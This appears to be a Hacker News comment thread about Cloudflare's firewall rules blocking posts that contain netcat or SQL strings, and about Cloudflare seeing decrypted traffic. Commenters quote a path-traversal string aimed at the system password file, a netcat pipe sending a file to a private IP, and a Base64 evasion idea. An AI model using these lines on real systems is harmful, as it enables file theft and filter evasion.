|
|
Any code including netcat (for it's tendency to be used in reverse shells) or SQL (for it's tendency to be used in SQL injections) tends to be blocked across the entire cloudflare-net these days.
|
|
|
|
 |
|
I see it. It explains why cloudflare is involved at all. But I don't see how this is related to the comment you replied to, which is saying that the text filter is ridiculous.
|
|
|
|
AFAIK most of these filters are disabled by default when setting up your website on Cloudflare, so most websites using the Cloudflare network likely have this turned off.
|
|
|
|
This is correct, it’s part of their WAF offering where there is rule-based blocking of content.
|
|
|
|
|
Interesting. That's the first time I have run across this. Makes sense.
|
|
|
|
That does not make sense at all; it is batshit-crazy broken.
|
|
|
|
|
Welcome to the world of WAFs. Pattern matching scary strings is big business.
|
|
|
|
|
|
Believe me you can find them present in popular sites you use everyday ;-) I caught one of them and reported it.
|
|
|
|
what dark magic is this? do you put it in front of all POSTs or something?
|
|
|
|
Not just POSTs, but any HTTP request - headers & query strings get inspected too.
|
|
|
|
|
I think they meant "corresponds with behavior observed" not "sounds rational."
|
|
|
|
So HN uses Cloudflare? That surprises me because typically I notice sites using Cloudflare because my mobile running GNU Linux cannot pass their dreaded Turnstyle. Luckily that does not happen for HN.
|
|
|
|
The aggressiveness of the "dreaded Turnstyle" is 100% configurable. It's very easy to disable it completely via Cloudflare settings. Using cloudflare doesn't require you to use all of its features, and almost every feature can be turned off.
|
|
|
|
|
|
I meant to imply that Dang only re-added CF recently due to the attacks. They haven't used CF in many years to my knowledge.
|
|
|
|
bummer. i used to like the legend that it was all on one commodity linux pc implemented in some nice concise lisp running on sbcl.
|
|
|
|
|
I ran into this when trying to post a comment with ../ ../ ../ etc/ passwd
(remove the spaces)
|
|
|
|
What if you Base64 encode this? Pretty trivial to add to the form logic.
|
|
|
|
yeah, i'd expect dang to just jump right on that. just because you feel it is trivial does not mean that it should be done.
|
|
|
|
Probably not related, but I've been getting lots of throttling-like huge page load delays on HN the last couple days, only when logged in. Any idea whether that's just an overloaded application server, or something Cloudflare is doing?
|
|
|
|
That's often the case with HN I think from past experience when there are large threads on HN, and dang has in the past said that's due to the application server.
|
|
|
|
|
Huh. Just tried submitting the same comment with the same result. Minimal test, if I try to edit this post removing the asterisk, I get the "banned" page nc* 192.168.2.100
|
|
|
|
Cloudflare has access to everyone's cleartext? I was unaware of this. NSA must love that
|
|
|
|
Same for Akamai, Cloudfront, Fastly, etc. Pretty much every business that wants to offload DDOS protection, caching,and some level of frontline security uses a proxying CDN. An alternative is to keep all of your CDN assets on a CDN bucket on its own hostname, with your main secret-containing business apps on your own servers, but it costs a lot to manage this level of separation and the payoff is only protection against the theoretical attack of "NSA can't attack our users/spy on them". If the NSA ever did do this on a large enough scale or to target a particularly notable person, it's very unlikely it would be kept a secret for long, and the end-business that used Cloudflare et al. wouldn't be implicated whatsoever since every business uses one of the big CDN providers.
|
|
|
|
They kept the other spying secret for a long time and it was only due to pretty heroic actions by one person that it got exposed. So I duno.
|
|
|
|
That makes using https instead of http a lot less relevant.
|
|
|
|
https is important for preventing spying by anyone else in between you and the server. ISPs, coffee shop owners, schools, etc used to spy on http traffic to see what people were doing/searching for, and ISPs like xFinity injected code into non-https pages to show "important messages" to users, e.g. going over your bandwidth limit[0]. The only weak link now is Cloudflare, which is still "less secure than a direct connection" (with respect to government spying, bugs[0], hackers, etc) but the threat level is drastically reduced. 0: https://blog.ryankearney.com/2013/01/comcast-caught-intercep... 1: https://news.ycombinator.com/item?id=13766339
|
|
|
|
Is it possible to trigger a warning when the encrypted content i send to a site is provided to Cloudflare?
|
|
|
|
Hardly! Nobody is forcing you to consent to MITM, you freely choose it every time you voluntarily use a website that utilizes one.
|
|
|
|
It’s a CDN that caches content and it’s able to inject “are you human?” verification pages, it can rewrite content on demand (e.g. serve optimized images / html / JavaScript). It seems obvious to me that they have access and ability to modify all cleartext content in-flight.
|
|
|
|
It's a TLS termination proxy that decrypt and re-encrypt your TLS packet. Technically Cloudflare can read anything unless you add your own crypt layer on top of TLS.
|
|
|
|
|
|
I'm pretty sure the default is they can see all the cleartext, since their product is based on TLS interception, for example to evaluate page rules. This is also how they insert extra headers in both the request and response.
|
|
|
|
Yes that's how Cloudfare works. The TLS certificate for basically any website using Cloudflare "ends" at Cloudflare's servers. It's then either forwarded on to the actual servers in cleartext or re-encrypted with an internal company certificate (maybe signed internally as well) to pass the connection on to the actual servers. It was the easy way many companies who didn't have the expertise to do their own certificate management moved from the http world to the https world. They just handed it off to cloudflare and kept their servers running http. F5 Networks, my former employer, sells something similar, but it's a box (or virtual appliance) you put in your own data centers somewhere that dead-ends the connection instead.
|
|
|
|
Dear cloudflare, please banhammer me cat testfile.txt | nc 192.168.2.100 1234
|
|
|
|
|
